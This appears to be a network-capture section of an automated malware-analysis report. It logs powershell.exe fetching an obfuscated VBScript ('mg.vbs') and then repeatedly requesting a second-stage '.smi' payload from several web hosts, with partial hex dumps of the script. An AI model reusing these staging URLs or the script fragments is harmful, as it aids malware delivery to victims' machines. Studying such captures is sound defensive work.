                                                                            2024-12-05 09:39:27 UTC8192INData Raw: 6d 2f 32 35 32 2d 70 6f 6d 70 65 2d 70 65 72 2d 74 72 61 74 74 6f 72 69 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 22 3e 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 35 33 2d 70 6f 6d 70 65 2d 70 65 72 2d 66 6f 67 6e 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 22 3e 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                            Data Ascii: m/252-pompe-per-trattori" title="Pompe per trattori">Pompe per trattori</a></li><li class=""><a href="https://www.fornid.com/253-pompe-per-fognatura" title="Pompe per fognatura">Pompe per fognatura</a><ul class="tm_subUL"><li class=""><a href="https://www
                                                                            2024-12-05 09:39:27 UTC8192INData Raw: 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 22 3e 43 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 35 2d 6d 6f 74 6f 70 6f 6d 70 65 2d 69 72 72 6f 72 61 74 72 69 63 69 22 20 74 69 74 6c 65 3d 22 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 22 3e 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                            Data Ascii: arrelli per irrorazione con motopompe">Carrelli per irrorazione con motopompe</a></li><li class=""><a href="https://www.fornid.com/225-motopompe-irroratrici" title="Motopompe irroratrici">Motopompe irroratrici</a></li></ul></li><li class=""><a href="https
                                                                            2024-12-05 09:39:27 UTC8192INData Raw: 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 3c 64 69 76 3e 0a 0a 09 09 09 09 09 09 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 3e 54 6f 74 61 6c 65 3c 2f 73 74 72 6f 6e 67 3e 0a 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 70 72 6f 64 75 63 74 5f 70 72 69 63 65 22 3e 3c 2f 73 70 61 6e 3e 0a 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 63 61 72 74 20 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 6d 64 2d 36 22 3e 0a 0a 09 09 09 09 3c 70 3e 0a 0a 09 09 09 09 09 3c 21 2d 2d 20 50 6c 75 72 61 6c 20 43 61 73 65 20 5b 62 6f 74 68 20 63 61 73 65 73 20 61 72 65 20 6e
                                                                            Data Ascii: </div><div><strong class="dark">Totale</strong><span id="layer_cart_product_price"></span></div></div></div><div class="layer_cart_cart col-xs-12 col-md-6"><p>... Plural Case [both cases are n
                                                                            2024-12-05 09:39:27 UTC8192INData Raw: 73 70 61 6c 6c 65 74 2d 65 6c 65 74 74 72 6f 6e 69 63 69 2d 6c 69 66 74 65 72 2d 62 79 2d 70 72 61 6d 61 63 22 20 74 69 74 6c 65 3d 22 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 22 3e 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 33 39 2d 64 69 73 74 72 69 62 75 7a 69 6f 6e 65 2d 67 72 61 73 73 6f 2d 6d 65 63 6c 75 62 65 22 20 74 69 74 6c 65 3d 22 44 49 53 54 52 49 42 55 5a 49 4f 4e 45 20 47 52 41 53 53 4f 20
                                                                            Data Ascii: spallet-elettronici-lifter-by-pramac" title="Transpallet elettronici LIFTER BY PRAMAC">Transpallet elettronici LIFTER BY PRAMAC</a></li></ul></li><li class=""><a href="https://www.fornid.com/339-distribuzione-grasso-meclube" title="DISTRIBUZIONE GRASSO
                                                                            2024-12-05 09:39:27 UTC416INData Raw: 46 46 50 31 20 2d 20 46 46 50 32 20 2d 20 46 46 50 33 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 39 30 2d 6d 61 73 63 68 65 72 65 2d 70 65 72 2d 73 61 6c 64 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 22 3e 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 31 34 2d 73 63 61 72 70 65 2d 61 6e 74 69 6e 66 6f 72 74 75 6e 69 73 74 69 63 68 65 2d 65 2d 73 74 69 76 61 6c 65 2d 64 61 2d 6c 61 76 6f 72 6f
                                                                            Data Ascii: FFP1 - FFP2 - FFP3</a></li><li class=""><a href="https://www.fornid.com/90-maschere-per-saldatura" title="Maschere per saldatura">Maschere per saldatura</a></li><li class=""><a href="https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.94971091.193.42.134437372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:29 UTC79OUTGET /na/mg.vbs HTTP/1.1
                                                                            Host: www.pineappletech.ae
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:29 UTC232INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            content-type: text/vbscript
                                                                            last-modified: Thu, 27 Jun 2024 13:15:58 GMT
                                                                            accept-ranges: bytes
                                                                            content-length: 29287
                                                                            date: Thu, 05 Dec 2024 09:39:29 GMT
                                                                            server: LiteSpeed
                                                                            vary: User-Agent
                                                                            2024-12-05 09:39:29 UTC1136INData Raw: 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 53 65 61 73 6f 6e 69 6e 67 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 0d 0a 50 75 62 6c 69 6b 75 6d 6d 65 74 62 61 74 66 6f 77 6c 20 3d 20 4d 69 64 28 4d 69 64 42 28 43 6f 6d 6d 61 6e 64 2c 20 34 34 2c 20 32 31 33 29 2c 32 31 2c 32 35 29 0d 0a 0d 0a 53 65 61 73 6f 6e 69 6e 67 20 3d 20 43 68 72 57 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 4f 70 73 6b 72 65 6b 6e 69 76 73 70 6c 69 64 20 3d 20 43 6f 6d 6d 61 6e 64 20 0d 0a 0d 0a 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 20 0d 0a 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 4c 65 6e 42 28 22 53 61 72 64 69 6e 69 65 72 65 6e 22 29 20 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72
                                                                            Data Ascii: Function Seasoning(Ambrain)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Seasoning = ChrW(Ambrain)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroingenirer
                                                                            2024-12-05 09:39:29 UTC14994INData Raw: 43 6f 6e 73 74 20 54 61 70 65 74 69 20 3d 20 22 44 65 6e 69 61 62 6c 65 20 64 61 74 61 73 74 79 72 20 75 6e 63 65 6c 69 62 61 74 65 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4e 6f 61 6f 72 64 65 74 73 20 3d 20 2d 34 35 30 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4f 73 74 65 6d 61 64 20 3d 20 26 48 37 35 30 32 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 42 6f 74 72 79 6f 6d 79 63 65 73 31 34 31 20 3d 20 26 48 46 46 46 46 45 38 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 55 66 6f 72 64 72 61 67 65 6c 69 67 73 74 65 20 3d 20 26 48 35 41 36 35 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 65 76 65 72 73 6f 20 3d 20 26 48 45 39 34 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 61 61 74 73 20 3d 20 22 44 65 63 69 6d
                                                                            Data Ascii: Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats = "Decim
                                                                            2024-12-05 09:39:30 UTC13157INData Raw: 65 64 6e 65 73 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6b 61 6b 73 70 69 6c 6c 65 72 65 6e 73 20 3d 20 31 37 34 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 47 6c 69 6e 73 65 6e 64 65 20 3d 20 2d 34 32 34 35 34 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 45 76 61 73 69 76 65 6e 65 73 73 20 3d 20 26 48 34 38 43 45 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4c 65 70 74 6f 72 72 68 69 6e 69 73 6d 31 35 35 20 3d 20 2d 31 38 39 31 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 72 6f 67 72 61 6d 6b 6f 6d 70 6c 65 6b 73 65 74 20 3d 20 22 43 6f 6e 67 72 65 73 73 65 73 20 6d 6f 6c 69 6d 65 6e 20 6e 67 73 74 65 6c 69 67 65 72 65 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 43 69 67 61 72 6b 61 73 73 65 20 3d 20 35
                                                                            Data Ascii: edness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarkasse = 5


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.949711184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:33 UTC183OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:34 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:34 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:34 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.949712184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:39 UTC65OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            2024-12-05 09:39:40 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:39 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:40 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.949713148.251.114.2334438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:45 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:46 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:39:45 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:39:46 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:39:46 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.949714184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:51 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:51 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:51 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:39:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.949716148.251.114.2334438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:57 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:57 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:39:57 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:39:57 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:39:57 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.949717184.171.244.2314438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:03 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:03 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:03 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.949719148.251.114.2334438008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:08 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:09 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:09 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:09 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
